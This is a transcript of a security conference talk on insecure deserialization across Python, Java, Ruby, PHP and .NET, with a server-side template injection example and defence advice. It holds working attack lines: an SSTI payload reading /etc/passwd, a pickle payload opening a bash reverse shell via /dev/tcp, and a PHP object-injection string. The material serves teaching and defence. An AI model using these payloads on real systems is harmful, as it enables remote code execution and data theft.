Vlada Kulish - Why So Serial?

Transcript

1. None

2. Vlada Kulish Security Engineer OWASP Lviv member

3. What is de/serialization Why is it important How it works

   and what’s the issue Examples & Demo

4. Idea

5. Types BINARY Java, Ruby READABLE YAML, XML, JSON HYBRID Python,

   PHP, Binary XML/JSON

6. Where it is Communicating data to different systems, process Wire

   protocols, web services Storing and re-using data Databases, cache servers, file systems Tokens HTTP cookies, HTML form parameters, API auth tokens

7. 2015 - java deserialization apocalypse

8. Are other languages safe?

9. None

10. Server-Side Template Injection http://address/injectedData Server Template {{5*5}} {{5*5}} 25 {{5*5}}

11. Problem @app.errorhandler(404) def page_not_found(e): template = '''{%% extends "layout.html" %%}

    {%% block body %%} <div class="center-content error"> <h1>Oops! That page doesn't exist.</h1> <h3>%s</h3> </div> {%% endblock %%} ''' % (request.url) return render_template_string(template), 404 {%% block body %%} <div class="center-content error"> <h1>Oops! That page doesn't exist.</h1> <h3>aaa{{5*5}}</h3> </div> {%% endblock %%}

12. {{‘ ‘.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}

13. {{‘ ‘.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}} <type 'str'>, <type 'basestring'>, <type 'object'> .__class__.__mro__ [<type

    'type'>, <type 'weakref'>, …, <type 'file'>, <type 'PyCapsule'>….] .__subclasses__()

14. How it works type class object subclass type params

15. It's DEMO time:)

16. Python Pickle Protocol v.0 – ACSII Protocol v.1 – Old

    binary format Protocol v.2 – New binary format

17. Pickle Virtual Machine Reconstruct a dict from the contents of

    the pickle. Create a class instance of the pickled object. Populate the class instance with the dict elements Instructure engine Stack Memo

18. GLOBAL and REDUCE Reduce - executes the callable Global –

    loads class object onto the PVM stack

19. Overwriting Old <Legitimate pickle> New <Inserted shellcode> Result Result of

    inserted shellcode, likely an error

20. Prepending Old <Legitimate pickle> New <Shellcode and some empty stack><Legitimate

    pickle> Result Original object

21. Altering Old <Legitimate pickle>…S’<html><h1>AAA…’\n <Legitimate pickle> New <Legitimate pickle>…S’<html><h1>Surprise!…’\n <Legitimate

    pickle> Result Identically-typed object to original with altered attribute value

22. Injecting Old <Legitimate pickle>…S’<html><body>Foo…’\n <Legitimate pickle> New <Legitimate pickle>…S’<html><body> <Instruction

    returning string>…’\n <Legitimate pickle> Result Identically-typed object to original with new attribute value assigned by executed instructions

23. Limitations There is no branching instruction There is no comparison

    instruction No exceptions and no error handling A pickle stream cannot overwrite or directly read itself using Pickle instructions Strings loaded in pickles do not undergo variable substitution Class instances and their methods cannot be directly referenced Only callables that are present in the top-level of a module are candidates for loading into the PVM

24. Vulnerable code filename = ’/tmp/some_file’ pickle.load(open(filename, "rb")) OR def server(skt):

    line = skt.recv(1024) obj = pickle.loads(line)

25. Vulnerable code def server(skt): line = skt.recv(1024) obj = pickle.loads(line)

    import pickle import socket import os class payload(object): def __reduce__(self): comm = "bash -i >& /dev/tcp/10.0.0.1/8080 0>&1" return (os.system, (comm,)) payload = pickle.dumps( payload())

26. Useful Links •http://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_ Slaviero_Sour_Pickles_WP.pdf •https://exploit-exercises.com/nebula/level17/ •https://blog.nelhage.com/2011/03/exploiting-pickle/

27. JAVA How to detect AC ED in HEX or R0

    in base64 Java class names in the dump Errors
28. None

29. Useful Links https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/ https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet https://github.com/frohoff/ysoserial http://jackson.thuraisamy.me/runtime-exec-payloads.html https://www.slideshare.net/frohoff1/appseccali-2015-marshalling-pickles https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-je nkins-opennms-and-your-application-have-in-common-this-vulnerability

30. Ruby CVE-2013-0156 Ruby on Rails XML processor YAML deserialization code

    execution Unsafe Object Deserialization Vulnerability in RubyGems CVE-2017-0903

31. Ruby on Rails (<4.1 by default) used Marshal.load() on user

    cookies def reset_password user = Marshal.load(Base64.decode64(params[:user])) unless params[:user].nil? … end <div class="content"> <%= hidden_field_tag 'user', Base64.encode64(Marshal.dump(@user)) %> … </div>

32. Useful Links http://blog.rubygems.org/2017/10/09/unsafe-object-deserialization-v ulnerability.html https://blog.rapid7.com/2013/01/09/serialization-mischief-in-ruby-l and-cve-2013-0156/ http://blog.codeclimate.com/blog/2013/01/10/rails-remote-code-execu tion-vulnerability-explained/ https://www.sitepoint.com/anatomy-of-an-exploit-an-in-depth-look-at -the-rails-yaml-vulnerability/

    https://github.com/OWASP/railsgoat/wiki/Extras:-Remote-Code-Executi on

33. PHP __destruct() __wakeup()

34. PHP if (isset ($_COOKIE['leet_hax0r'])) { $sess_data = unserialize (base64_decode ($_COOKIE['leet_hax0r']));

    …} a:2:{s:2:"ip";s:15:“IP_addr";i:1;O:3:"SQL":2:{s:5:"que ry";s:38:"SELECT password AS username FROM users";s:4:"conn";N;}}

35. Real-life examples CVE-2015-8562: Joomla Remote Code Execution CVE-2015-7808: vBulletin 5

    Unserialize Code Execution CVE-2015-2171: Slim Framework PHP Object Injection

36. Useful Links https://blog.checkpoint.com/wp-content/uploads/2016/08/Exp loiting-PHP-7-unserialize-Report-160829.pdf https://www.owasp.org/index.php/PHP_Object_Injection https://www.tarlogic.com/en/blog/how-php-object-injection- works-php-object-injection/ https://pagely.com/blog/2017/05/php-object-injection-insec ure-unserialize-wordpress

37. .Net CVE-2017-9424 - Breeze.Server.NET CVE-2017-9785 - NANCYFX NANCY UP TO

    1.4.3/2.0 JSON DATA CSRF.CS CVE-2017-9822 - DNN (aka DotNetNuke) before 9.1.1 Remote Code Execution

38. Useful Links https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/ DEFCON-25-Alvaro-Munoz-JSON-attacks.pdf https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13t h-JSON-Attacks-wp.pdf https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_ Are_You_My_Type_WP.pdf https://blog.scrt.ch/2016/05/12/net-serialiception/

39. The DEFENCE Avoid magic methods Use as simple formats as

    possible Do not save session state on client Use White and Blacklists for classes Yes, manually serialize/ deserialize complex object Authentication+ Encryption DON’T TRUST DATA – VERIFY IT Use sandboxes

40. Thank you! Thanks https://explodingkittens.com/ for good mood and design ideas!